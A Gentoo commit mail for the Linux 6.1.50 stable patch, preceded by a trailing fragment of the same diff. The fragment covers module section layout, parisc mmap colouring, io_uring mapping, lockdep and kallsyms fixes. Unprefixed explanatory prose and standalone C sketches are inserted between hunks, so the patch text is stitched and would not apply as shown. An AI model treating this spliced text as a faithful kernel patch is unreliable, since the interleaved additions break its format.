+--- a/arch/arm/kernel/module-plts.c
++++ b/arch/arm/kernel/module-plts.c
+@@ -256,7 +256,7 @@ int module_frob_arch_sections(Elf_Ehdr *ehdr, Elf_Shdr *sechdrs,
+ 		/* sort by type and symbol index */
+ 		sort(rels, numrels, sizeof(Elf32_Rel), cmp_rel, NULL);
+ 
+-		if (strncmp(secstrings + dstsec->sh_name, ".init", 5) != 0)
++		if (!module_init_layout_section(secstrings + dstsec->sh_name))
+ 			core_plts += count_plts(syms, dstsec->sh_addr, rels,
+ 						numrels, s->sh_info);
+ 		else
+diff --git a/arch/arm64/kernel/module-plts.c b/arch/arm64/kernel/module-plts.c
+index 5a0a8f552a610..c703b5db8eb11 100644
+--- a/arch/arm64/kernel/module-plts.c
++++ b/arch/arm64/kernel/module-plts.c
+@@ -7,6 +7,7 @@
+ #include <linux/ftrace.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
++#include <linux/moduleloader.h>
+ #include <linux/sort.h>
+ 
+ static struct plt_entry __get_adrp_add_pair(u64 dst, u64 pc,
+@@ -343,7 +344,7 @@ int module_frob_arch_sections(Elf_Ehdr *ehdr, Elf_Shdr *sechdrs,
+ 		if (nents)
+ 			sort(rels, nents, sizeof(Elf64_Rela), cmp_rela, NULL);
+ 
+-		if (!str_has_prefix(secstrings + dstsec->sh_name, ".init"))
++		if (!module_init_layout_section(secstrings + dstsec->sh_name))
+ 			core_plts += count_plts(syms, rels, numrels,
+ 						sechdrs[i].sh_info, dstsec);
+ 		else
+diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
+index 09a34b07f02e6..9915062d5243c 100644
+--- a/arch/parisc/kernel/sys_parisc.c
++++ b/arch/parisc/kernel/sys_parisc.c
+@@ -24,32 +24,28 @@
+ #include <linux/personality.h>
+ #include <linux/random.h>
+ #include <linux/compat.h>
++#include <linux/elf-randomize.h>
+ 
+-/* we construct an artificial offset for the mapping based on the physical
+- * address of the kernel mapping variable */
+-#define GET_LAST_MMAP(filp)		\
+-	(filp ? ((unsigned long) filp->f_mapping) >> 8 : 0UL)
+-#define SET_LAST_MMAP(filp, val)	\
+-	 { /* nothing */ }
+-
+-static int get_offset(unsigned int last_mmap)
+-{
+-	return (last_mmap & (SHM_COLOUR-1)) >> PAGE_SHIFT;
+-}
++/*
++ * Construct an artificial page offset for the mapping based on the physical
++ * address of the kernel file mapping variable.
++ */
++#define GET_FILP_PGOFF(filp)		\
++	(filp ? (((unsigned long) filp->f_mapping) >> 8)	\
++		 & ((SHM_COLOUR-1) >> PAGE_SHIFT) : 0UL)
+ 
+-static unsigned long shared_align_offset(unsigned int last_mmap,
++static unsigned long shared_align_offset(unsigned long filp_pgoff,
+ 					 unsigned long pgoff)
+ {
+-	return (get_offset(last_mmap) + pgoff) << PAGE_SHIFT;
++	return (filp_pgoff + pgoff) << PAGE_SHIFT;
+ }
+ 
+ static inline unsigned long COLOR_ALIGN(unsigned long addr,
+-			 unsigned int last_mmap, unsigned long pgoff)
++			 unsigned long filp_pgoff, unsigned long pgoff)
+ {
+ 	unsigned long base = (addr+SHM_COLOUR-1) & ~(SHM_COLOUR-1);
+ 	unsigned long off  = (SHM_COLOUR-1) &
+-		(shared_align_offset(last_mmap, pgoff) << PAGE_SHIFT);
+-
++		shared_align_offset(filp_pgoff, pgoff);
+ 	return base + off;
+ }
+ 
+@@ -98,126 +94,91 @@ static unsigned long mmap_upper_limit(struct rlimit *rlim_stack)
+ 	return PAGE_ALIGN(STACK_TOP - stack_base);
+ }
+ 
++enum mmap_allocation_direction {UP, DOWN};
+ 
+-unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
+-		unsigned long len, unsigned long pgoff, unsigned long flags)
++static unsigned long arch_get_unmapped_area_common(struct file *filp,
++	unsigned long addr, unsigned long len, unsigned long pgoff,
++	unsigned long flags, enum mmap_allocation_direction dir)
+ {
+ 	struct mm_struct *mm = current->mm;
+ 	struct vm_area_struct *vma, *prev;
+-	unsigned long task_size = TASK_SIZE;
+-	int do_color_align, last_mmap;
++	unsigned long filp_pgoff;
++	int do_color_align;
+ 	struct vm_unmapped_area_info info;
+ 
+-	if (len > task_size)
++	if (unlikely(len > TASK_SIZE))
+ 		return -ENOMEM;
+ 
+ 	do_color_align = 0;
+ 	if (filp || (flags & MAP_SHARED))
+ 		do_color_align = 1;
+-	last_mmap = GET_LAST_MMAP(filp);
++	filp_pgoff = GET_FILP_PGOFF(filp);
+ 
+ 	if (flags & MAP_FIXED) {
+-		if ((flags & MAP_SHARED) && last_mmap &&
+-		    (addr - shared_align_offset(last_mmap, pgoff))
++		/* Even MAP_FIXED mappings must reside within TASK_SIZE */
++		if (TASK_SIZE - len < addr)
++			return -EINVAL;
++
++		if ((flags & MAP_SHARED) && filp &&
++		    (addr - shared_align_offset(filp_pgoff, pgoff))
+ 				& (SHM_COLOUR - 1))
+ 			return -EINVAL;
+-		goto found_addr;
++		return addr;
+ 	}
+ 
+ 	if (addr) {
+-		if (do_color_align && last_mmap)
+-			addr = COLOR_ALIGN(addr, last_mmap, pgoff);
++		if (do_color_align)
++			addr = COLOR_ALIGN(addr, filp_pgoff, pgoff);
+ 		else
+ 			addr = PAGE_ALIGN(addr);
+ 
+ 		vma = find_vma_prev(mm, addr, &prev);
+-		if (task_size - len >= addr &&
++		if (TASK_SIZE - len >= addr &&
+ 		    (!vma || addr + len <= vm_start_gap(vma)) &&
+ 		    (!prev || addr >= vm_end_gap(prev)))
+-			goto found_addr;
++			return addr;
+ 	}
+ 
+-	info.flags = 0;
+ 	info.length = len;
++	info.align_mask = do_color_align ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
++	info.align_offset = shared_align_offset(filp_pgoff, pgoff);
++
++	if (dir == DOWN) {
++		info.flags = VM_UNMAPPED_AREA_TOPDOWN;
++		info.low_limit = PAGE_SIZE;
++		info.high_limit = mm->mmap_base;
++		addr = vm_unmapped_area(&info);
++		if (!(addr & ~PAGE_MASK))
++			return addr;
++		VM_BUG_ON(addr != -ENOMEM);
++
++		/*
++		 * A failed mmap() very likely causes application failure,
++		 * so fall back to the bottom-up function here. This scenario
++		 * can happen with large stack limits and large mmap()
++		 * allocations.
++		 */
++	}
++
++	info.flags = 0;
+ 	info.low_limit = mm->mmap_legacy_base;
+ 	info.high_limit = mmap_upper_limit(NULL);
+-	info.align_mask = last_mmap ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
+-	info.align_offset = shared_align_offset(last_mmap, pgoff);
+-	addr = vm_unmapped_area(&info);
+-
+-found_addr:
+-	if (do_color_align && !last_mmap && !(addr & ~PAGE_MASK))
+-		SET_LAST_MMAP(filp, addr - (pgoff << PAGE_SHIFT));
+-
+-	return addr;
++	return vm_unmapped_area(&info);
+ }
+ 
+-unsigned long
+-arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
+-			  const unsigned long len, const unsigned long pgoff,
+-			  const unsigned long flags)
++unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
++	unsigned long len, unsigned long pgoff, unsigned long flags)
+ {
+-	struct vm_area_struct *vma, *prev;
+-	struct mm_struct *mm = current->mm;
+-	unsigned long addr = addr0;
+-	int do_color_align, last_mmap;
+-	struct vm_unmapped_area_info info;
+-
+-	/* requested length too big for entire address space */
+-	if (len > TASK_SIZE)
+-		return -ENOMEM;
+-
+-	do_color_align = 0;
+-	if (filp || (flags & MAP_SHARED))
+-		do_color_align = 1;
+-	last_mmap = GET_LAST_MMAP(filp);
+-
+-	if (flags & MAP_FIXED) {
+-		if ((flags & MAP_SHARED) && last_mmap &&
+-		    (addr - shared_align_offset(last_mmap, pgoff))
+-			& (SHM_COLOUR - 1))
+-			return -EINVAL;
+-		goto found_addr;
+-	}
+-
+-	/* requesting a specific address */
+-	if (addr) {
+-		if (do_color_align && last_mmap)
+-			addr = COLOR_ALIGN(addr, last_mmap, pgoff);
+-		else
+-			addr = PAGE_ALIGN(addr);
+-
+-		vma = find_vma_prev(mm, addr, &prev);
+-		if (TASK_SIZE - len >= addr &&
+-		    (!vma || addr + len <= vm_start_gap(vma)) &&
+-		    (!prev || addr >= vm_end_gap(prev)))
+-			goto found_addr;
+-	}
+-
+-	info.flags = VM_UNMAPPED_AREA_TOPDOWN;
+-	info.length = len;
+-	info.low_limit = PAGE_SIZE;
+-	info.high_limit = mm->mmap_base;
+-	info.align_mask = last_mmap ? (PAGE_MASK & (SHM_COLOUR - 1)) : 0;
+-	info.align_offset = shared_align_offset(last_mmap, pgoff);
+-	addr = vm_unmapped_area(&info);
+-	if (!(addr & ~PAGE_MASK))
+-		goto found_addr;
+-	VM_BUG_ON(addr != -ENOMEM);
+-
+-	/*
+-	 * A failed mmap() very likely causes application failure,
+-	 * so fall back to the bottom-up function here. This scenario
+-	 * can happen with large stack limits and large mmap()
+-	 * allocations.
+-	 */
+-	return arch_get_unmapped_area(filp, addr0, len, pgoff, flags);
+-
+-found_addr:
+-	if (do_color_align && !last_mmap && !(addr & ~PAGE_MASK))
+-		SET_LAST_MMAP(filp, addr - (pgoff << PAGE_SHIFT));
++	return arch_get_unmapped_area_common(filp,
++			addr, len, pgoff, flags, UP);
++}
+ 
+-	return addr;
++unsigned long arch_get_unmapped_area_topdown(struct file *filp,
++	unsigned long addr, unsigned long len, unsigned long pgoff,
++	unsigned long flags)
++{
++	return arch_get_unmapped_area_common(filp,
++			addr, len, pgoff, flags, DOWN);
+ }
+ 
+ static int mmap_is_legacy(void)
+@@ -379,7 +340,7 @@ asmlinkage long parisc_fallocate(int fd, int mode, u32 offhi, u32 offlo,
+ 			      ((u64)lenhi << 32) | lenlo);
+ }
+ 
+-long parisc_personality(unsigned long personality)
++asmlinkage long parisc_personality(unsigned long personality)
+ {
+ 	long err;
+ 
+diff --git a/arch/x86/include/asm/sections.h b/arch/x86/include/asm/sections.h
+index a6e8373a5170f..3fa87e5e11aba 100644
+--- a/arch/x86/include/asm/sections.h
++++ b/arch/x86/include/asm/sections.h
+@@ -2,8 +2,6 @@
+ #ifndef _ASM_X86_SECTIONS_H
+ #define _ASM_X86_SECTIONS_H
+ 
+-#define arch_is_kernel_initmem_freed arch_is_kernel_initmem_freed
+-
+ #include <asm-generic/sections.h>
+ #include <asm/extable.h>
+ 
+@@ -18,20 +16,4 @@ extern char __end_of_kernel_reserve[];
+ 
+ extern unsigned long _brk_start, _brk_end;
+ 
+-static inline bool arch_is_kernel_initmem_freed(unsigned long addr)
+-{
+-	/*
+-	 * If _brk_start has not been cleared, brk allocation is incomplete,
+-	 * and we can not make assumptions about its use.
+-	 */
+-	if (_brk_start)
+-		return 0;
+-
+-	/*
+-	 * After brk allocation is complete, space between _brk_end and _end
+-	 * is available for allocation.
+-	 */
+-	return addr >= _brk_end && addr < (unsigned long)&_end;
+-}
+-
+ #endif	/* _ASM_X86_SECTIONS_H */
+diff --git a/drivers/acpi/thermal.c b/drivers/acpi/thermal.c
+index 40b07057983e0..40ecb55b52f8c 100644
+--- a/drivers/acpi/thermal.c
++++ b/drivers/acpi/thermal.c
+@@ -59,10 +59,6 @@ static int tzp;
+ module_param(tzp, int, 0444);
+ MODULE_PARM_DESC(tzp, "Thermal zone polling frequency, in 1/10 seconds.");
+ 
+-static int nocrt;
+-module_param(nocrt, int, 0);
+-MODULE_PARM_DESC(nocrt, "Set to take no action upon ACPI thermal zone critical trips points.");
+-
+ static int off;
+ module_param(off, int, 0);
+ MODULE_PARM_DESC(off, "Set to disable ACPI thermal support.");
+@@ -1128,7 +1124,7 @@ static int thermal_act(const struct dmi_system_id *d) {
+ static int thermal_nocrt(const struct dmi_system_id *d) {
+ 	pr_notice("%s detected: disabling all critical thermal trip point actions.\n",
+ 		  d->ident);
+-	nocrt = 1;
++	crt = -1;
+ 	return 0;
+ }
+ static int thermal_tzp(const struct dmi_system_id *d) {
+diff --git a/drivers/thunderbolt/tmu.c b/drivers/thunderbolt/tmu.c
+index d9544600b3867..49146f97bb16e 100644
+--- a/drivers/thunderbolt/tmu.c
++++ b/drivers/thunderbolt/tmu.c
+@@ -416,6 +416,7 @@ int tb_switch_tmu_disable(struct tb_switch *sw)
+ 		 * mode.
+ 		 */
+ 		ret = tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++		if (ret)
+ 			return ret;
+ 
+ 		tb_port_tmu_time_sync_disable(up);
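
The one-line thunderbolt fix above restores the usual check-and-propagate idiom: the return value of the rate write was computed but execution fell through unconditionally. A trivial sketch of the corrected shape (do_write() is a made-up stand-in for the register write):

    #include <stdio.h>

    static int do_write(int fail) { return fail ? -5 : 0; }   /* -EIO */

    static int tmu_disable(int fail)
    {
        int ret = do_write(fail);
        if (ret)                /* the check the patch adds back */
            return ret;
        puts("rate off, continuing teardown");
        return 0;
    }

    int main(void)
    {
        tmu_disable(0);
        return tmu_disable(1) ? 1 : 0;
    }
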
+diff --git a/include/linux/moduleloader.h b/include/linux/moduleloader.h
+index 9e09d11ffe5b3..1322652a9d0d9 100644
+--- a/include/linux/moduleloader.h
++++ b/include/linux/moduleloader.h
+@@ -39,6 +39,11 @@ bool module_init_section(const char *name);
+  */
+ bool module_exit_section(const char *name);
+ 
++/* Describes whether within_module_init() will consider this an init section
++ * or not. This behaviour changes with CONFIG_MODULE_UNLOAD.
++ */
++bool module_init_layout_section(const char *sname);
++
+ /*
+  * Apply the given relocation to the (simplified) ELF.  Return -error
+  * or 0.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index ed8e9deae284a..b0e47fe1eb4bb 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -72,6 +72,7 @@
+ #include <linux/io_uring.h>
+ #include <linux/audit.h>
+ #include <linux/security.h>
++#include <asm/shmparam.h>
+ 
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/io_uring.h>
+@@ -3110,6 +3111,49 @@ static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+ 	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
+ }
+ 
++static unsigned long io_uring_mmu_get_unmapped_area(struct file *filp,
++			unsigned long addr, unsigned long len,
++			unsigned long pgoff, unsigned long flags)
++{
++	void *ptr;
++
++	/*
++	 * Do not allow mapping to a user-provided address, to avoid breaking
++	 * the aliasing rules. Userspace cannot guess the offset address of
++	 * a kernel kmalloc()ed memory area.
++	 */
++	if (addr)
++		return -EINVAL;
++
++	ptr = io_uring_validate_mmap_request(filp, pgoff, len);
++	if (IS_ERR(ptr))
++		return -ENOMEM;
++
++	/*
++	 * Some architectures have strong cache aliasing requirements.
++	 * For such architectures we need a coherent mapping which aliases
++	 * kernel memory *and* userspace memory. To achieve that:
++	 * - use a NULL file pointer to reference physical memory, and
++	 * - use the kernel virtual address of the shared io_uring context
++	 *   (instead of the userspace-provided address, which has to be 0UL
++	 *   anyway).
++	 * - use the same pgoff which the get_unmapped_area() uses to
++	 *   calculate the page colouring.
++	 * For architectures without such aliasing requirements, the
++	 * architecture will return any suitable mapping because addr is 0.
++	 */
++	filp = NULL;
++	flags |= MAP_SHARED;
++	pgoff = 0;	/* has been translated to ptr above */
++#ifdef SHM_COLOUR
++	addr = (uintptr_t) ptr;
++	pgoff = addr >> PAGE_SHIFT;
++#else
++	addr = 0UL;
++#endif
++	return current->mm->get_unmapped_area(filp, addr, len, pgoff, flags);
++}
++
+ #else /* !CONFIG_MMU */
+ 
+ static int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
+@@ -3324,6 +3368,8 @@ static const struct file_operations io_uring_fops = {
+ #ifndef CONFIG_MMU
+ 	.get_unmapped_area = io_uring_nommu_get_unmapped_area,
+ 	.mmap_capabilities = io_uring_nommu_mmap_capabilities,
++#else
++	.get_unmapped_area = io_uring_mmu_get_unmapped_area,
+ #endif
+ 	.poll		= io_uring_poll,
+ #ifdef CONFIG_PROC_FS
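
On VIPT architectures such as parisc, two mappings alias cleanly only when their virtual addresses are congruent modulo SHM_COLOUR, which is why the hunk above feeds the kernel virtual address of the ring into get_unmapped_area() as the pgoff. A small sketch of the arithmetic (the addresses and the 4 MiB colour granule are illustrative):

    #include <stdint.h>
    #include <stdio.h>

    #define PAGE_SHIFT 12
    #define SHM_COLOUR (4UL << 20)          /* 4 MiB alias granule */

    int main(void)
    {
        uintptr_t kaddr = 0xffff8880004a3000UL;   /* made-up kernel vaddr */
        unsigned long pgoff = kaddr >> PAGE_SHIFT;

        /* a user mapping is colour-compatible iff it matches kaddr
         * modulo SHM_COLOUR */
        uintptr_t uaddr = 0x00005555000a3000UL;   /* made-up user vaddr */
        int compatible = ((kaddr ^ uaddr) & (SHM_COLOUR - 1)) == 0;

        printf("pgoff=%#lx compatible=%d\n", pgoff, compatible);
        return 0;
    }
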
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index 676328a7c8c75..ad3cccb0970f8 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -188,16 +188,13 @@ static bool cleanup_symbol_name(char *s)
+ 
+ static int compare_symbol_name(const char *name, char *namebuf)
+ {
+-	int ret;
+-
+-	ret = strcmp(name, namebuf);
+-	if (!ret)
+-		return ret;
+-
+-	if (cleanup_symbol_name(namebuf) && !strcmp(name, namebuf))
+-		return 0;
+-
+-	return ret;
++	/* The kallsyms_seqs_of_names table is sorted by names as they read
++	 * after cleanup_symbol_name() (see scripts/kallsyms.c) when clang LTO
++	 * is enabled. To keep the bisection in kallsyms_lookup_names() correct,
++	 * apply cleanup_symbol_name(namebuf) before comparing name and namebuf.
++	 */
++	cleanup_symbol_name(namebuf);
++	return strcmp(name, namebuf);
+ }
+ 
+ static int kallsyms_lookup_names(const char *name,
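
The invariant restored above is a general one: binary search only works if the comparator orders keys the same way the array was sorted. Since the table is sorted by the cleaned-up names, the comparator must clean up before comparing too. A userspace analogue (normalize() is a made-up stand-in for cleanup_symbol_name()):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static void normalize(char *s)      /* strip ".llvm.<hash>" suffixes */
    {
        char *dot = strchr(s, '.');
        if (dot)
            *dot = '\0';
    }

    static int cmp(const void *key, const void *elem)
    {
        char buf[64];
        snprintf(buf, sizeof(buf), "%s", *(const char * const *)elem);
        normalize(buf);                 /* must match the sort order */
        return strcmp((const char *)key, buf);
    }

    int main(void)
    {
        /* sorted by *normalized* name: alpha < beta < gamma */
        const char *syms[] = { "alpha.llvm.1", "beta.llvm.2", "gamma" };
        const char **hit = bsearch("beta", syms, 3, sizeof(*syms), cmp);
        printf("found: %s\n", hit ? *hit : "(none)");
        return 0;
    }
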
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index 50d4863974e7a..0224b0329d011 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -817,34 +817,26 @@ static int very_verbose(struct lock_class *class)
+  * Is this the address of a static object:
+  */
+ #ifdef __KERNEL__
+-/*
+- * Check if an address is part of freed initmem. After initmem is freed,
+- * memory can be allocated from it, and such allocations would then have
+- * addresses within the range [_stext, _end].
+- */
+-#ifndef arch_is_kernel_initmem_freed
+-static int arch_is_kernel_initmem_freed(unsigned long addr)
+-{
+-	if (system_state < SYSTEM_FREEING_INITMEM)
+-		return 0;
+-
+-	return init_section_contains((void *)addr, 1);
+-}
+-#endif
+-
+ static int static_obj(const void *obj)
+ {
+-	unsigned long start = (unsigned long) &_stext,
+-		      end   = (unsigned long) &_end,
+-		      addr  = (unsigned long) obj;
++	unsigned long addr = (unsigned long) obj;
+ 
+-	if (arch_is_kernel_initmem_freed(addr))
+-		return 0;
++	if (is_kernel_core_data(addr))
++		return 1;
++
++	/*
++	 * keys are allowed in the __ro_after_init section.
++	 */
++	if (is_kernel_rodata(addr))
++		return 1;
+ 
+ 	/*
+-	 * static variable?
++	 * in initdata section and used during bootup only?
++	 * NOTE: On some platforms the initdata section is
++	 * outside of the _stext ... _end range.
+ 	 */
+-	if ((addr >= start) && (addr < end))
++	if (system_state < SYSTEM_FREEING_INITMEM &&
++		init_section_contains((void *)addr, 1))
+ 		return 1;
+ 
+ 	/*
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a627345d4fd9..7a6f43d2b7757 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -1401,7 +1401,7 @@ long module_get_offset(struct module *mod, unsigned int *size,
+ 	return ret;
+ }
+ 
+-static bool module_init_layout_section(const char *sname)
++bool module_init_layout_section(const char *sname)
+ {
+ #ifndef CONFIG_MODULE_UNLOAD
+ 	if (module_exit_section(sname))


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-30 14:42 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-30 14:42 UTC (permalink / raw)
  To: gentoo-commits

commit:     bcbc0e39da9f3b81b92bc26417a3a3ebf0395db5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 30 14:42:12 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 30 14:42:12 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bcbc0e39

Linux patch 6.1.50

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1049_linux-6.1.50.patch | 31691 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 31695 insertions(+)

diff --git a/0000_README b/0000_README
index 6ce2c13b..870654fc 100644
--- a/0000_README
+++ b/0000_README
@@ -239,6 +239,10 @@ Patch:  1048_linux-6.1.49.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.49
 
+Patch:  1049_linux-6.1.50.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.50
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1049_linux-6.1.50.patch b/1049_linux-6.1.50.patch
new file mode 100644
index 00000000..4a052c91
--- /dev/null
+++ b/1049_linux-6.1.50.patch
@@ -0,0 +1,31691 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 379387e20a96d..07a9c274c0e29 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -6027,7 +6027,7 @@ S:	Supported
+ F:	Documentation/networking/devlink
+ F:	include/net/devlink.h
+ F:	include/uapi/linux/devlink.h
+-F:	net/core/devlink.c
++F:	net/devlink/
+ 
+ DH ELECTRONICS IMX6 DHCOM BOARD SUPPORT
+ M:	Christoph Niedermaier <cniedermaier@dh-electronics.com>
+diff --git a/Makefile b/Makefile
+index 61ebd54aba899..e5e1fdeef8bf0 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 49
++SUBLEVEL = 50
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/mips/include/asm/cpu-features.h b/arch/mips/include/asm/cpu-features.h
+index c0983130a44c9..e0a4da4cfd8bc 100644
+--- a/arch/mips/include/asm/cpu-features.h
++++ b/arch/mips/include/asm/cpu-features.h
+@@ -121,7 +121,24 @@
+ #define cpu_has_4k_cache	__isa_ge_or_opt(1, MIPS_CPU_4K_CACHE)
+ #endif
+ #ifndef cpu_has_octeon_cache
+-#define cpu_has_octeon_cache	0
++#define cpu_has_octeon_cache						\
++({									\
++	int __res;							\
++									\
++	switch (boot_cpu_type()) {					\
++	case CPU_CAVIUM_OCTEON:						\
++	case CPU_CAVIUM_OCTEON_PLUS:					\
++	case CPU_CAVIUM_OCTEON2:					\
++	case CPU_CAVIUM_OCTEON3:					\
++		__res = 1;						\
++		break;							\
++									\
++	default:							\
++		__res = 0;						\
++	}								\
++									\
++	__res;								\
++})
+ #endif
+ /* Don't override `cpu_has_fpu' to 1 or the "nofpu" option won't work.  */
+ #ifndef cpu_has_fpu
+@@ -351,7 +368,7 @@
+ ({									\
+ 	int __res;							\
+ 									\
+-	switch (current_cpu_type()) {					\
++	switch (boot_cpu_type()) {					\
+ 	case CPU_M14KC:							\
+ 	case CPU_74K:							\
+ 	case CPU_1074K:							\
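
Both hunks in this file switch feature probing from current_cpu_type() to boot_cpu_type(), so that every core answers feature queries from the boot CPU's identity. A compressed sketch of the statement-expression macro shape (a GNU C extension, with invented CPU ids):

    #include <stdio.h>

    enum cpu { CPU_OCTEON, CPU_OCTEON2, CPU_OTHER };

    static enum cpu boot_cpu = CPU_OCTEON2;
    static int boot_cpu_type(void) { return boot_cpu; }

    #define cpu_has_octeon_cache            \
    ({                                      \
        int __res;                          \
        switch (boot_cpu_type()) {          \
        case CPU_OCTEON:                    \
        case CPU_OCTEON2:                   \
            __res = 1;                      \
            break;                          \
        default:                            \
            __res = 0;                      \
        }                                   \
        __res;                              \
    })

    int main(void)
    {
        printf("octeon cache: %d\n", cpu_has_octeon_cache);
        return 0;
    }
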
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 6bf8dc0b8f935..d702359f8ab5e 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -447,24 +447,30 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
+ 	def_bool y
+ 	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
+-	depends on AS_IS_GNU && AS_VERSION >= 23800
++	# https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=98416dbb0a62579d4a7a4a76bab51b5b52fec2cd
++	depends on AS_IS_GNU && AS_VERSION >= 23600
+ 	help
+-	  Newer binutils versions default to ISA spec version 20191213 which
+-	  moves some instructions from the I extension to the Zicsr and Zifencei
+-	  extensions.
++	  Binutils-2.38 and GCC-12.1.0 bumped the default ISA spec to the newer
++	  20191213 version, which moves some instructions from the I extension to
++	  the Zicsr and Zifencei extensions. This requires explicitly specifying
++	  Zicsr and Zifencei when binutils >= 2.38 or GCC >= 12.1.0. Zicsr
++	  and Zifencei are supported in binutils from version 2.36 onwards.
++	  To make life easier, and avoid forcing toolchains that default to a
++	  newer ISA spec to version 2.2, relax the check to binutils >= 2.36.
++	  Toolchains (clang < 17, GCC < 11.3.0) for which this is not possible,
++	  or which need special treatment, are dealt with in TOOLCHAIN_NEEDS_OLD_ISA_SPEC.
+ 
+ config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
+ 	def_bool y
+ 	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
+ 	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
+-	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	# https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=d29f5d6ab513c52fd872f532c492e35ae9fd6671
++	depends on (CC_IS_CLANG && CLANG_VERSION < 170000) || (CC_IS_GCC && GCC_VERSION < 110300)
+ 	help
+-	  Certain versions of clang do not support zicsr and zifencei via -march
+-	  but newer versions of binutils require it for the reasons noted in the
+-	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
+-	  option causes an older ISA spec compatible with these older versions
+-	  of clang to be passed to GAS, which has the same result as passing zicsr
+-	  and zifencei to -march.
++	  Certain versions of clang and GCC do not support zicsr and zifencei via
++	  -march. This option causes an older ISA spec compatible with these older
++	  versions of clang and GCC to be passed to GAS, which has the same result
++	  as passing zicsr and zifencei to -march.
+ 
+ config FPU
+ 	bool "FPU support"
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 7f34f3c7c8827..737c0857b14cd 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -11,7 +11,13 @@ compat_vdso-syms += flush_icache
+ COMPAT_CC := $(CC)
+ COMPAT_LD := $(LD)
+ 
+-COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
++# binutils 2.35 does not support the zifencei extension, but in the ISA
++# spec 20191213, G stands for IMAFD_ZICSR_ZIFENCEI.
++ifdef CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
++else
++	COMPAT_CC_FLAGS := -march=rv32imafd -mabi=ilp32
++endif
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
+ # Disable attributes, as they're useless and break the build.
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 9fcfa5c4dad79..71b5059e092ab 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -19,8 +19,7 @@
+  * FPU state for a task MUST let the rest of the kernel know that the
+  * FPU registers are no longer valid for this task.
+  *
+- * Either one of these invalidation functions is enough. Invalidate
+- * a resource you control: CPU if using the CPU for something else
++ * Invalidate a resource you control: CPU if using the CPU for something else
+  * (with preemption disabled), FPU for the current task, or a task that
+  * is prevented from running by the current task.
+  */
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index caf33486dc5ee..a083f9ac9e4f6 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -679,7 +679,7 @@ static void fpu_reset_fpregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 
+ 	fpregs_lock();
+-	fpu__drop(fpu);
++	__fpu_invalidate_fpregs_state(fpu);
+ 	/*
